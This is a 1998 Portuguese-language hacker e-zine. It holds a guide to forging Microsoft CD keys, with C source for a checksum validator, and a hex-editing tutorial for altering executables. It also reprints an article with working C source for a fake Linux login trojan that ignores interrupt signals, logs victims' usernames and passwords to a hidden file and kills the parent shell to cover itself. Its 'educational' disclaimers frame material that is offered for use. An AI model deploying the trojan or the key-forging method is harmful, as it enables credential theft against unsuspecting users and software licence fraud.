                            ▄▄██   ▓ ▄▄██    █▄▄▄█
                         ▒ ▀   ▒   ▓█   ▀  ▓█▀▓  ██▒
                         ░ ▓██▄    ▒█ █    ▒██▒  ██░
                           ▒   ▄█▓ ▒▓█  ▄  ░██  █▀ ░
                         ▓███▄▄▀▒▒ ░▒████▒ ░▒███▒█▄
                         ▒ ▒▓▒ ▒ ░ ░░ ▒░ ░ ░░ ▓▒░ ▒
                         ░ ░▒  ░ ░  ░ ░  ░  ░ ▒░  ░
                         ░  ░  ░      ░       ░   ░
                               ░      ░  ░     ░
      ███▄ ▄█▀█▓  ▄▄▄          ▄▄██      ▄▄██    ██▓  █▀▒   █▓ ▓ ▄▄██
     ▓██▒▀█▀ ██▒ ▒▄▀ █▄     ▒ ▀   ▒   ▒ ▀   ▒   ▓Ì█▒ ▓██░   █▒ ▓█   ▀
     ▓██    ▓█ ░ ▒██  ▀█▄   ░ ▓██▄    ░ ▓██▄    ▒ █▒  ▓▀▄  █▒░ ▒█ █
     ▒██    ▒    ░▄█▄▄▄▄██    ▒   ▄█▓   ▒   ▄█▓ ░Ì ░   ▒██ █░░ ▒▓█  ▄
     ▒▄█▒   ░ █▒  ▓█   ▓██▒ ▓███▄▄▀▒▒ ▓███▄▄▀▒▒ ░Ì█░    ▒▀█ ░  ░▒████▒
     ░ ▒░   ░  ░  ▒▒   ▓▒█░ ▒ ▒▓▒ ▒ ░ ▒ ▒▓▒ ▒ ░ ░▓      ░ Ì ░  ░░ ▒░ ░
     ░  ░      ░   ▒   ▒▒ ░ ░ ░▒  ░ ░ ░ ░▒  ░ ░  ▒ ░    ░ ░░    ░ ░  ░
     ░      ░      ░   ▒    ░  ░  ░   ░  ░  ░    ▒ ░      ░░      ░
            ░          ░  ░       ░         ░    ░         ░      ░  ░
                                                     ░
                 ▓ ▄▄██     ▓███████▒  ██▓  █▄ ▄       ▓ ▄▄██
                 ▓█   ▀     ▒ ▒    █░ ▓Ì█▒  ██ ▀█   █  ▓█   ▀
                 ▒█ █       ░ █████ ░ ▒ █▒ ▓██  ▀█ ██▒ ▒█ █
                 ▒▓█  ▄      █     ▓  ░Ì ░ ▓██▒  Ì ██▒ ▒▓█  ▄
                 ░▒████▒    ▒▀▄▄▄▄██▓ ░Ì█░ ▒██░   ▓██░ ░▒████▒
                 ░░ ▒░ ░    ░▒▒ ▓░▒░▒ ░▓   ░ ▒░   ▒ ▓  ░░ ▒░ ░
                 ░ ░  ░    ░░▒ ▒ ░ ▒  ▒ ░ ░ ░░   ░ ▒░  ░ ░  ░
                 ░       ░ ░ ░ ░ ░  ▒ ░    ░   ░ ░     ░
                 ░  ░      ░ ░      ░            ░     ░  ░
                             ░
                       SeQ MaSsÎvE® E-Zine N#2 Maio/1998 



┌╔═          ═╗┐
│║ DISCLAIMER ║│
└╚═          ═╝┘

   Sempre o mesmo Blá, Blá Blá... mas é preciso, e quem tem Zine ou sempre
ta soltando textos pela Net sabe muito bem disso... Há muita coisa envolvida
nisso. Bom, Esta E-zine foi feita, fundada etc.. etc.. por SeQ MaSsÎvE e é
TOTALMENTE Proibida a cópia ou roubo do material contido aqui !!! Também
NÃO me responssabilizo por mau uso do material contido aqui, tanto é que ja
tive muita paciência com "Alguns" que arrebentaram o proprio PC e veio por
a culpa em mim !
Me Deixa muito PUTO, de na primeira semana de lançamento da Zine, ja
colocaram textos que faz parte da Zine em outras Home Pages... Não vou
sair brigando com estes caras e não vou citar nomes, telefone, e nem o
RG da pessoa que fez isso, mas.. quero alertar àos meus leitores que a
SeQ MaSsÎvE® E-Zine você só encontra em (http://www.terravista.pt/Meco/1840).


┌╔═                           ═╗┐
│║ DISCLAIMER DO TEXTO CD KEYS ║│
└╚═                           ═╝┘

   Este Texto foi TOTALMENTE escrito por SeQ MaSsÎvE® e é TOTALMENTE PROIBIDO
o roubo de Informações contidas nele! Além de ser somente educacional, não
quero que a Microsoft do Brasil venha reclamar, pois não pirateio CD's e isto
é considerado uma pesquisa sem efeitos prejudicativos para a própria.
CASO, E SOMENTE CASO TENHA UMA ZINE, QUE POR SUA VEZ TRATA-SE DE HACKING, E
QUEIRA COLOCAR ESTE TEXTO NELA, BASTA ENTRAM EM CONTATO, TORNANDO ASSIM MAIS
FACÍL A CIRCULAÇÃO DAS INFORMAÇÕES EM BOAS MÃOS NO BRASIL.

CONTATO: ICQ UIN: 1292685
         E-MAIL: seq@bestway.com.br e seq_puc@hotmail.com


┌╔═             ═╗┐
│║ NESTA ZINE... ║│
└╚═             ═╝┘

   INDICE:
   1 root:Tgvv9s338hhs97:0:0:/root:/bin/bash
   Galera pra que Indice se vc's vão ler a Zine INTEIRINHA ????

Vamo nessa....

program Zine-2;
uses crt, DOS;

var
   Textos: string[+ q 255, hehe!];
   mais textos: text;

begin
     clrscr; {Limpando a tela, ooop'z'z}



TUDO SOBRE AS...
▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄   ▄▄▄   ▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄   ▄▄▄ ▄▄▄▄▄▄▄
█▄▄▄▄▄▄█ █▄▄▄▄▄█   █ █   █▄█ █▄▄▄▄▄█ █ █   █ █ █▄▄▄▄▄█
▄▄▄      ▄▄▄  ▄▄▄  █ █▄▄▄▄▄  ▄▄▄▄▄▄  █ █▄▄▄█ █ ▄▄▄▄▄▄▄
███      ███  ███  ██▄▄▄▄▄▀▄ ██▄▄▄█  █▄▄▄█▄▄▄█ █▄▄▄▄██
███      ███  ███  ███   ███ ███        ███        ███
██▀▀▀▀▀█ ██▀▀▀▀██  ███   ███ ██▀▀▀▀█    ███    █▀▀▀▀██
▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀  ▀▀▀   ▀▀▀ ▀▀▀▀▀▀▀    ▀▀▀    ▀▀▀▀▀▀▀
By SeQ MaSsÎvE® 1998 - Todos os Direitos Reservados...

   
   O Bill Gates perde mais um ponto com a comunidade hacking, após a
descoberta das CD Keys dos maióres softwares da Microsoft, eu SeQ MaSsÎvE®,
depois de 3 semanas pesquisando o caso de perto, com amigos lá fora, venho,
ou melhor trasmito para a galera Brasileira "Ô Terra Boa !!!", neste TXT,
Tudo sobre este fato!
   Na página da Microsoft (http://www.microsoft.com), o próprio suporte,
revela que o tipo de criptografia usada nas CD Keys, é muito fácil de ser
burlada, isso para usuarios avançados, e Crackers com um simple Hexa Editor.
Mas não revela que, além deste método, um pouco dificil, existe um outro
método, mais fácil que abrir uma garrafa descartável de coca-cola...

   >Há dois tipos de CD Keys<

   A primeira é formada de 10 digitos e contém valores numéricos de 0 a 9.

   Exemplo do formato do Microsoft Windows 96 Atualização:

   XXX-XXXXXXX

   Agora a BOMBA no Bill, além de por dia ser pirateados mais de 1 Milhão de
Softwares com a marca Microsoft, ele perde mais essa:
   Os três primeiros digitos são LIXO, quando vc digita uma CD-Key, estes
três primeiros digitos podem ser quaisquer número. Os outros sete digitos são
a Chave Criptografada.
Veja no esquema abaixo um exemplo mais claro dessa façanha.


            Exemplo: XXX-1292685 <-- heheh, Gostaram do numerinho ?
                     |_| |_____|
                      |     |
                      LIXO  |
                            CD KEY CRIPTOGRAFADA


   Antes de finalizar com a descoberta, veja o segundo tipo de chave do Bill.
   Ela é formada por 20 Digitos, sendo 3 digitos fixo, ou seja, OEM Sigla de
contrato, mais 17 números que podem ser de 0 a 9.

 ->>OU SEJA, O BILL ESPERTÃO, SIMPLESMENTE ACRECENTOU MAIS LIXO ÀS CD KEYS<<-

   Chamados de Microsoft OEM CD Keys, vc pode ver no esquema abaixo, aonde
o Bill acrescentou mais lixos!

            Exemplo: XXXXX-OEM-0123456-XXXXX
                     |_______| |_____| |___|
                         |        |      |
                         |       CD KEY  |
                         |_______________|
                         |
                         |
                         LIXO


    BUUMM, Os 7 digitos que compõe a real CD Key, pode ter combinações
contrárias, além de "as vezes" usar a mesma chave para varios programas do
nosso amigão aííííí !!

   Exemplos:

   Usando uma chave ORIGINAL Microsoft, vc's podem compreender melhor:
   Não posso dar o nome do produto, para não causar conflitos futuros com a
Microsoft do Brasil.

Product ID: 10597-OEM-0021443-43712
                      |_____|
                         |
                         CD KEY VÁLIDA.

Criando uma CD Key Válida apartir de uma Original:

Product ID: 10597-OEM-0021443-43712 <- Original
            LIXO!-OEM-3441200-LIXO! <- Chave válida

   Claro que no lugar o LIXO! vc deve copiar a do original !

   Percebe-se que invertendo a chave original obtem-se uma válida para ser
usada em qualquer produto Microsoft.
   E MAIS !!!! As CD Keys, originais ou válidas podem ser usadas em outros
produtos Microsoft, que moleza hein ??? Este texto foi pesquisado depois de
eu quase perder um trabalho, pq tava sem o Excel, e tava com o Office na mão,
mas sem a CD Key dele, tentei editar tudo é quando arquivo, abrir os compac-
tados, e depois de muita raiva, a ultima alternativa que tive foi pegar o
Contrato de Licença da merda do Windows95 e coloquei no OEM do Office, e
Pronto, tava aceita a CD Key, Viva !!! uhuhu !
   IMPORTANTE: As rotinas usadas pela microsoft em senhas e CD Keys é baseada
em XOR ou SUM. Sendo que a usada aqui foi uma rotina SUM, podendo não valer
para CD's que contém rotina XOR.

   Comunicando-se com a Damaged Cybernetics, sobre mais informações sobre o
ocorrido "E que trampo que tive, a sorte foi um amigo no ICQ, que de fato
não quer ser divulgado aqui de jeito nenhum, e tem motivos..., é super
camarada dos caras !!!" Conseguimos um Source Code em C++ de um programa que
por sua vez é TOTALMENTE ILEGAL E PROIBIDO O USO PARA PIRATEAR SOFTWARES,
ALÉM DISSO, LEIA ATENTAMENTE O DISCLAIMER DESTA ZINE ANTES DE TERMINÁ-LO.
CASO TENHA IGNORADO ESTA PARTE.


+corte+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++corte+

/*
     This source code contains a authentication routine that will
     validate Microsoft CD Keys.  It is meant that this source code
     is a learning tool and not a PIRACY tool.  It is also meant to
     show how a large corporation like Microsoft spend MILLIONS of
     dollars on development and come up with this protection scheme.

     *BorlandC 3.1 was used to compile this successfully.

     It is a crime to redistribute these routines in a commercial
     venture of any kind without permission or licensing agreement.

     C)opyright 1995 Damaged Cybernetics

     If you have any questions or comments, please contact the
     following ppl via the Internet:

         Donald Moore   (MindRape)    mind@goodnet.com
         Donald Staheli (Royce)    staheli@goodnet.com
         Web Page:          www.goodnet.com/%7Estaheli

     */

     #include 
     #include 
     #include 
     #include 

     /* Prototypes */
     void help(void);
     char ValidateCDKey(char *szKey);

     /* definitions for ValidateCDKey function */
     #define VALID_KEY       1   /* Yes this is a valid key              */
     #define INVALID_KEY     0   /* No this is not a valid key           */
     #define INVALID_CHAR   -1   /* This key contains invalid characters */
     #define INVALID_LENGTH -2   /* This key is the incorrect length     */

     /* Length of a Microsoft CD Key, this include the hyphen!            */
     #define MS_CD_KEY_LENGTH  11 /* XXX-0123456                          */
     #define OEM_CD_KEY_LENGTH 23 /* XXXXX-OEM-0123456-XXXXX              */
     #define REAL_KEY_LENGTH    7 /* length of the key is really 7 chars! */
     #define REAL_MS_OFFSET     4 /* The MS CD REAL Key offset            */
     #define REAL_OEM_OFFSET   10 /* The OEM CD Real Key offset           */


     /*
     char ValidateCDKey(char *szKey)
     ENT: szKey - Char - Key to validate
     RET: VALID_KEY - The key is valid
     INVALID_KEY    - The key is invalid
     INVALID_LENGTH - The key is not a valid CD Key length
     INVALID_CHAR   - The key contains invalid characters

        ValidateCDKey will take either a Microsoft or a Microsoft OEM CD Key
        and verify of it's a authentic CD Key which can be used to unlock their
        software when installing.

      */
     char ValidateCDKey (char *szKey)
     { 
       unsigned long ulCheckSum = 0L;  /* Hold our checksum value here */
       int           iStrLength;       /* Length of the CD Key         */
       int           i          = 0;   /* dummy counter                */

       iStrLength = strlen(szKey);

       /* is the key the correct length? */
       if (iStrLength != MS_CD_KEY_LENGTH && iStrLength != OEM_CD_KEY_LENGTH)
         return INVALID_LENGTH;

       /* now move the pointer to the start of the REAL key */
       szKey += iStrLength == MS_CD_KEY_LENGTH ? REAL_MS_OFFSET :
         REAL_OEM_OFFSET;


       /* now loop thru the CD Key, adding each digit to each other
        * and then mod it by 7.  If it's 0 we have a valid key!
        *
        * btw this routine can be optimized!  It is written for sake of
        * clairity.
        */

       while (i < REAL_KEY_LENGTH)
         {
         if (isdigit(*szKey))
             {
               /* convert each char to it's actual decimal value by
                * subtracting 48 and keep accumlating the values
                */
               ulCheckSum += ((int) *szKey - 48);
             }
         else
             return INVALID_CHAR;  /* we hit a NON numeric character       */

         szKey++;
         i++;
        
         }

         if (!(ulCheckSum % 7))
           return VALID_KEY;       /* This IS a valid Microsoft CD Key     */

         return INVALID_KEY;     /* This IS NOT a valid Microsoft CD Key */
     }

     void help(void)
     {
       printf("This program will verify whether the CD Key you are using is a\n"
       "a valid Microsoft CD Key.  It is not meant to endorse PIRACY, but\n"
       "to show a big company like Microsoft who has spent millions of\n"
       "dollars and came up with this routine.\n"
       "\nUsage: CDKey \n"
       "    i.e. Microsoft CD Key - CDKey 012-0123456\n"
       "    i.e. OEM CD Key       - CDKey 01234-OEM-012345-01234\n"
      );
       exit(0);
     }


     void main(int argc,char *argv[])
     {
        puts("Microsoft CD Key Validation\n(C) 1995 Damaged Cybernetics (www.goodnet.com/%7Estaheli)\n");

        if (argc != 2)  /* opps user didn't pass any parameters */
          help();

        switch (ValidateCDKey(argv[1]))
          {
            case INVALID_CHAR   : puts("This key is either not formatted properly or contains alphanumeric characters.");
             break;
            case INVALID_LENGTH : puts("This key is neither a valid length for a Microsoft or a OEM CD Key.");
             break;
            case INVALID_KEY    : puts("This is NOT a valid Microsoft CD Key.");
             break;
            case VALID_KEY      : puts("This is a VALID Microsoft CD Key.");
             break;
          }

     }

+corte+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++corte+

   É isso ai Galera Rule'z leitores !!! espero que tenha gostado da explica-
ção, e tenham entendido que não é pra sair pirateando CD's do Bill com CD Keys
falsas, ainda + que isso pode dar cadeia'z na certa !!
TEXTO EDUCACIONAL !!!


┌╔═                                               ═╗┐
│║ NOTICIAS - E-MAIL - NOVIDADES - BESTEIRAS - ETC ║│
└╚═                                               ═╝┘

   Neste #2 tem Noticias e Novidades, "Para alguns", é isso ai... poucos
souberam que ando tendo contato com o pessoal da .pt zine de Portugal, mas
especificamente com o Secretos, além do pessoal de lá serem muito gente fina,
e muito cool, me trataram muito muito bem, e fico muito grato por eles terem
colocado um artigo meu na .pt zine 02... Como é sempre bom apresentar seus
projetos para o pessoal mais avançado, eu tive a permissão de colocar um
artigo deles por aqui !!!
Vocês ja estão cansados de saber o que é Cavalos de Tróia, mas muitos ainda
não sabem nem o que é Cavalo, uhuh !!

Escolhi o Texto do Elektro sobre cavalos de tróia que explica muito bem o
que é e, para o pessoal avançado, ele coloca um Source em C Shell para Linux
Rule'z para compreender melhor o que é isso !!!

Let'z See iT'
   
   
Cavalos de Tróia
-----------------
by Elektro
Kaotik Team (http://www.complex-x.net/kaotik)

Aqui ha uns tempos recebemos um mail, que nos perguntava, o que é um cavalo
de Tróia, como funciona, se resulta...

Aqui vai:

Um cavalo de Tróia, é um pequeno e simples programa, que funciona tem como
principal objectivo, simular o ecrã de login de um sistema. Ou seja, é um
programa, que esta a correr numa conta normal, mas que possui o interface
da sessão de login, que vemos, quando nos ligamos ao sistema...o objectivo
é enganar o utilizador que vai utilizar a maquina a seguir a nós,(nós pomos
o cavalo de Tróia a correr e o desgraçado, que virá a seguir, muito
inocentemente, tentará entrar para a sua área, escrevendo o seu login e a
sua password,nos campos do nosso cavalo de Tróia,...que registará tudo num
ficheiro, na área onde corre o programa!!:)))
São geralmente, programas simples, pequenos, que não requerem muitos
conhecimentos de programação, e os erros são faceis de detectar!!
No mínimo pode-se dizer que sao programas "divertidos", pois estar a
observar a nossa obra a actuar, é demais!:))

Existem porem, alguns pontos a ter em consideração, ao fazer um cavalo de
troia: proteger o programa dos sinais, tais como o Ctrl-c, ou Ctrl-z, que são
os mais conhecidos,...e arranjar maneira de no final, o programa feche a área
onde esta a correr (obvio, para quem não quer ser apanhado), e aqui e que
complica mais um bocado, mas existe uma maneira, que na minha opinião e a
mais segura: será a de fazer um kill ao processo pai, do nosso programa!!!
Na practica isto é, fazer um kill a shell, logo uma VERDADEIRA sessão de
login iniciara! No entanto, no meio de isto tudo, o cavalo de troia,
äpanhou"o login e a password a um pobre infeliz (teoricamente)!

Para exemplificar, fiz um ësboço"de um cavala de Tróia, com os pontos mais
básicos, e mais essenciais: (continua..)

-----------------------------CORTE POR AQUI-----------------------------------

     #include
     #include 
     #include 
     #include 

     #define ERRO "Login incorrect"

     char *getpass();
     char login[14],
          *password;
     int PPID;     
     FILE *fich_output;



     void main(int argc, char *argv[]){


     signal(SIGINT, SIG_IGN);     /* protege o programa dos sinais
     signal(SIGTSTP, SIG_IGN);          Ctrl-c e Ctrl-z            */


          if( argc<2 ){
                       printf("\nUso: %s \n", argv[0]);
                       exit(0);
                      }
                     

          system("clear");


          /* cria um ciclo enquanto o login for nulo  */
          while(strlen(login)==0){
                  printf("\n%s login: ",argv[1]);
                  gets(login);
                 }


          printf("Password: ");
          password=getpass();      /* desliga o echo para o stdout */

          if((fich_output=fopen(".pw_log","a"))==NULL) {
                                   puts("\nErro de ficheiro\n");
                                   exit(0);
                                                       }

          fprintf(fich_output,"Login: %s ,password: %s\n", login,
                                                           password);
             
          puts(ERRO);

          PPID=getppid();          /* retorna o PID da shell */

          kill(PPID,9);

          }


----------------------------CORTE POR AQUI------------------------------------

(continuação...)

como é obvio este cavalo de Tróia e para sistemas linux!
É obvio também que isto e um cavalo de troia "pobrezinho",...será sempre bom
melhorar o aspecto gráfico do output do programa (que e fácil, e os próprios
iniciantes em programacao conseguem faze-lo!).
Outra coisa importante, é reparar como protegi o programa dos sinais Ctrl-c,
e Ctrl-z...porque senão corríamos o risco de vermos a nossa área exposta, se
a vitima é mais esperta que nós!!Uma ideia sera tentar proteger o programa
para o maior numero possível de sinais!!
Para no final encerrar a nossa área, para fazer um kill a shell, ou ao
processo pai, usei a função getppid, para obter o Parent Process Id, e no
final enviei o sinal 9, que e o kill,...e quando o programa termina, em vez
de retornar a shell, como esta "morreu", corre uma verdadeira sessão de login.
Para aumentar a segurança, o ficheiro para onde são registados os resultados
do cavalo de Tróia e um ficheiro oculto (.pw_log)...outras precauções,
poderão ser tomadas, se por exemplo ao compilar o programa lhe der o atributo
de ocul- to...(para quem nao sabe, isto consegue-se se o primeiro caracter
do nome do ficheiro for '.'!
O ciclo criado enquanto o login for nulo, prevê a vitima faca qualquer coisa
como fazer return em "branco"...
Para acabar,...resta dizer que para "receber" a password, usei a função
getpass, declarada no header pwd.h,...esta função redireciona o output.
Podia-se ter usado a função stty do sistema...façam, quem estiver em Linux,
man stty.

Mais uma vez friso, que estes programas devem-se aproximar o máximo da
realidade de cada maquina...ao correr este programa o 2 argumento deve ser o
nome da maquina host, na rede.


Valeu'z Elektro
[]'z a Kaotik Team (Portugal - http://www.complex-x.net/kaotik)



┌╔═                                        ═╗┐
│║ O PERIGO DO HEXA DECIMAL By SeQ MaSsÎvE® ║│
└╚═                                        ═╝┘
   Atualizado Especialmente para a Zine#02
 

   Vou explicar agora o que um Hacker pode fazer com programas que você
costuma baixar para testar, como Nukes,IrcScripts etc..


   Ates vou explicar rapidamente o que são números Hexadecimais:


   São números que representa um determinado espaço dentro de seu computador,
um determinado caracter q o computador consiga entender. Se você pensa que
quando você digita a letra A em seu teclado, o computador entende como A,
você esta enganado. Bom, não vou explicar o que é Hexadecimal aqui nem a pau,
só o que devem saber é que os números hexadecimais são representado da
seguinte forma:


Hexadecimal Base 16 [ 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F]
Portanto o número 10 em Hexa é A o 11 é B e etc...

 

Mas e daí ??? O que o cara faz com os programas usando esse monte de
numeros ???

Ele altera os programas que costuma baixar, vou dar um exemplo simples de
alterar somente os caracteres ASCII de um programa executavel (.EXE ou .COM).


O Programa que vou usar para explicar este procedimento de alteração é o
IP Query , um programa que mostra seu IP e seu NetBios.

 

Os Programadores usam um editor Hexadecimal para alterar programas, que nem
se quer são deles. Mas com um objetivo, Ganhar dinheiro em cima disso, ou
seja, programadores o escambal.... os Hackers, mas também não é Um IP Query e
nem programas que estão acostumado a ver, são Programas Roubados, ou Projetos
Roubados. Vou usar um programa comum para explicar e alertar você !

 

Começando a alterar um código, mas como ??

Usa-se um Editor de Hexadecimal para isto, existem vários pela Net. O mais
usado é o Hexawork Shop que se encontra para Download em:
http://www.bosoft.com .

Ao abrir o programa voce se depara com varios códigos Hexadecimais. irei
explicar o metodo "básico" de se alterar somente a parte ASCII do programa. 

Procura-se pela palavra que queira alterar, exemplo "IP Query"

00018D10 4950 2051 7565 7279 0000 0000 5365 7520 IP Query....Seu  <-- AQUI
00018D20 2049 5020 4164 6472 6573 7300 4E6F 6D65  IP Address.Nome
00018D30 2064 6F20 486F 7374 2020 0000 4E6F 2049  do Host  ..No I
00018D40 5020 4164 6472 6573 7320 6173 7369 676E P Address assign
00018D50 6564 0000 4357 696E 4170 7000 0000 0000 ed..CWinApp.....



Para alterar você deve seguir os seguintes passos:

 

1 - Usar o mesmo espaço para alterar;

2 - Nunca sobrescrever palavras fora dos numeros de Bytes que contém os
caracteres:

Exemplo: 

 IP Query
 12345678

Para alterar para outra palavra, usa-se os mesmos campos, PS: Contando com
o espaço, que para a maquina significa também um caracter. Digamos então
que queira alterar para Alterado,

 IP Query
 12345678

 Alterado
 12345678

Usou todos os campos e não ultrapassou o número de bytes do programa.


Veja agora a alteração como ficará no Editor !!

>>>>>>>ORIGINAL !!!

00018D10 4950 2051 7565 7279 0000 0000 5365 7520 IP Query....Seu 
00018D20 2049 5020 4164 6472 6573 7300 4E6F 6D65  IP Address.Nome
00018D30 2064 6F20 486F 7374 2020 0000 4E6F 2049  do Host  ..No I
00018D40 5020 4164 6472 6573 7320 6173 7369 676E P Address assign
00018D50 6564 0000 4357 696E 4170 7000 0000 0000 ed..CWinApp.....

>>>>>>>ALTERADO !!!
00018D10 4950 2051 7565 7279 0000 0000 5365 7520 Alterado....Seu
00018D20 2049 5020 4164 6472 6573 7300 4E6F 6D65  IP Idiota .Nome
00018D30 2064 6F20 486F 7374 2020 0000 4E6F 2049  da Puta  ..No I
00018D40 5020 4164 6472 6573 7320 6173 7369 676E P Address assign
00018D50 6564 0000 4357 696E 4170 7000 0000 0000 ed..CWinApp.....

Palavras alteradas:

IP Query -> Alterado
IP Address -> IP Idiota (Nota-se q aqui usei um espaço no final)
Nome do Host -> Nome da Puta

Nota-se que nunca se pode exeder o numero de bytes do programa, ao executá-lo
após a alteração irá ocorrer erro !

Ao rodar o programa irá notar que no Menu as palavras, ou os Caracteres ASCII
forão alterados !!!
 

ATENÇÃO: Este programa foi escrito por David Terracino e foi usado somente
para demostração de como se alterar programas executaveis usando um editor
Hexadecimal.

DISCLAIMER 2: Este Texto pode ser considerado um texto Anarchy, portanto a
prática destas informações podem causar varios Danos Morais à quem faz,
podendo até ser multado ou até mesmo preso por roubo de Direitos Autorais
presente nos programas, ... Vamos com calma galera!! o négocio é sério !!!

 

Sobre este Texto:

 

Editado em 14 de março de 1998 por SeQ MaSsÎvE(r) Para Kamikaze Productions
Atualizado em 15 de Maio de 1998 por SeQ MaSsÎvE(r) Para a SeQ MaSsÎvE®
E-zine #02.


E-mail: seq@bestway.com.br
        seq_pucc@hotmail.com

Todos os direitos reservados do Produtor.

IP Query V 1.6 foi escrito por David Terracino tiamat@warwick.net 

Aguarde a #03 Galera'z Valeu'z !


┌╔═               ═╗┐
│║ SOBRE ESTA ZINE ║│
└╚═               ═╝┘

   Ésta Zine foi feita por SeQ MaSsÎvE® e tem como objetivo, mostrar tudo o
que diz a respeito de Programação e Hacking. É Totalmente proibido a retirada
ou publicação não autorizada desta Zine!

STAFF #02

TUDO SOBRE AS...
▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄   ▄▄▄   ▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄   ▄▄▄ ▄▄▄▄▄▄▄
█▄▄▄▄▄▄█ █▄▄▄▄▄█   █ █   █▄█ █▄▄▄▄▄█ █ █   █ █ █▄▄▄▄▄█
▄▄▄      ▄▄▄  ▄▄▄  █ █▄▄▄▄▄  ▄▄▄▄▄▄  █ █▄▄▄█ █ ▄▄▄▄▄▄▄
███      ███  ███  ██▄▄▄▄▄▀▄ ██▄▄▄█  █▄▄▄█▄▄▄█ █▄▄▄▄██
███      ███  ███  ███   ███ ███        ███        ███
██▀▀▀▀▀█ ██▀▀▀▀██  ███   ███ ██▀▀▀▀█    ███    █▀▀▀▀██
▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀  ▀▀▀   ▀▀▀ ▀▀▀▀▀▀▀    ▀▀▀    ▀▀▀▀▀▀▀
Feito por
By SeQ MaSsÎvE® 1998 - Todos os Direitos Reservados...
UIN: 1292685
Mail'z: seq@bestway.com.br 0u seq_puc@hotmail.com

┌╔═                                               ═╗┐
│║ NOTICIAS - E-MAIL - NOVIDADES - BESTEIRAS - ETC ║│
└╚═                                               ═╝┘
Matéria especial !!

Cavalos de Tróia
-----------------
by Elektro
Kaotik Team (http://www.complex-x.net/kaotik)

┌╔═                                        ═╗┐
│║ O PERIGO DO HEXA DECIMAL By SeQ MaSsÎvE® ║│
└╚═                                        ═╝┘
   Atualizado Especialmente para a Zine#02

UIN: Ta tudo ali em cima !!
E-mail'z: Também !!

┌╔═                                           ═╗┐
│║ IMPORTANTE - CADASTRO, TEXTOS E MIRROR SITE ║│
└╚═                                           ═╝┘

   Bom, como teve muita gente que não entendeu como receber a revista por
E-mail'z, vou repetir a mesma parte sobre isso na #02.

CADASTRO DO LEITOR:

Se você é leitor desta E-zine e gostaria de Receber Mail'z com as novidades
e a propria Zine pelo correio, basta me enviar um E-mail com o seguinte
Subject: LEITOR SEQ MASSIVE E-ZINE, no corpo da menssagem, envie seu
Nome(Opcional), Nick, Idade, E-mail, Home Page(Opcional).
PS: Se não tiver os dados obrigatórios NÃO vou mandar !!!

Obrigado por ler a SeQ MaSsÎvE® E-Zine Número 1. hehe e a #02 Tb!
Valeu'z

TEXTOS:

   Para Participar e enviar textos proprios ou não, mande para
seq@bestway.com.br com o seguintes itens nescessários !!!

- O TEXTO  !!!!
- IMPORTANTISSIMO -->>> O AUTOR ORIGINAL DO TEXTO !!!
- SEU NICK !!!
- SEU E-MAIL (Se não quiser que apareça seu Mail na Zine, coloque isso na Msg)

MIRROR:

   Quem for Interessado em fazer um Mirror da Zine em sua própria Home Page
Mande, um E-mail com o Endereço da Home Page, Seu Nick, e aguarde a Resposta
por E-mail, com os Html's nescessários para o Mirror !!!
PS: Não faça Mirror por Conta PRóPriA !!!!!!!!!!!!!!!!!!!!!!!!!!



DESCULPA MULTIPLA:

   + Uma vez, estou devendo textos Phreack pra Vc'z, caros Leitores !!!!
Isso Devido ao Problema citado em cima, ou o Texto estava sem o Nick, ou
Sem o nome do Autor Original !! Só é aceito textos ORIGINAIS, pois ja
na primeira Zine tive confusão e conflito com os proprios autores dos txt's
e isso não pode acontecer denovo... VALEU'Z GALERA !!!

Comentários sobre a Zine: seq@bestway.com.br


See Ya na #03 !! Em BREVE !!!!!!!!


                            ▄▄██   ▓ ▄▄██    █▄▄▄█
                         ▒ ▀   ▒   ▓█   ▀  ▓█▀▓  ██▒
                         ░ ▓██▄    ▒█ █    ▒██▒  ██░
                           ▒   ▄█▓ ▒▓█  ▄  ░██  █▀ ░
                         ▓███▄▄▀▒▒ ░▒████▒ ░▒███▒█▄
                         ▒ ▒▓▒ ▒ ░ ░░ ▒░ ░ ░░ ▓▒░ ▒
                         ░ ░▒  ░ ░  ░ ░  ░  ░ ▒░  ░
                         ░  ░  ░      ░       ░   ░
                               ░      ░  ░     ░
      ███▄ ▄█▀█▓  ▄▄▄          ▄▄██      ▄▄██    ██▓  █▀▒   █▓ ▓ ▄▄██
     ▓██▒▀█▀ ██▒ ▒▄▀ █▄     ▒ ▀   ▒   ▒ ▀   ▒   ▓Ì█▒ ▓██░   █▒ ▓█   ▀
     ▓██    ▓█ ░ ▒██  ▀█▄   ░ ▓██▄    ░ ▓██▄    ▒ █▒  ▓▀▄  █▒░ ▒█ █
     ▒██    ▒    ░▄█▄▄▄▄██    ▒   ▄█▓   ▒   ▄█▓ ░Ì ░   ▒██ █░░ ▒▓█  ▄
     ▒▄█▒   ░ █▒  ▓█   ▓██▒ ▓███▄▄▀▒▒ ▓███▄▄▀▒▒ ░Ì█░    ▒▀█ ░  ░▒████▒
     ░ ▒░   ░  ░  ▒▒   ▓▒█░ ▒ ▒▓▒ ▒ ░ ▒ ▒▓▒ ▒ ░ ░▓      ░ Ì ░  ░░ ▒░ ░
     ░  ░      ░   ▒   ▒▒ ░ ░ ░▒  ░ ░ ░ ░▒  ░ ░  ▒ ░    ░ ░░    ░ ░  ░
     ░      ░      ░   ▒    ░  ░  ░   ░  ░  ░    ▒ ░      ░░      ░
            ░          ░  ░       ░         ░    ░         ░      ░  ░
                                                     ░
                 ▓ ▄▄██     ▓███████▒  ██▓  █▄ ▄       ▓ ▄▄██
                 ▓█   ▀     ▒ ▒    █░ ▓Ì█▒  ██ ▀█   █  ▓█   ▀
                 ▒█ █       ░ █████ ░ ▒ █▒ ▓██  ▀█ ██▒ ▒█ █
                 ▒▓█  ▄      █     ▓  ░Ì ░ ▓██▒  Ì ██▒ ▒▓█  ▄
                 ░▒████▒    ▒▀▄▄▄▄██▓ ░Ì█░ ▒██░   ▓██░ ░▒████▒
                 ░░ ▒░ ░    ░▒▒ ▓░▒░▒ ░▓   ░ ▒░   ▒ ▓  ░░ ▒░ ░
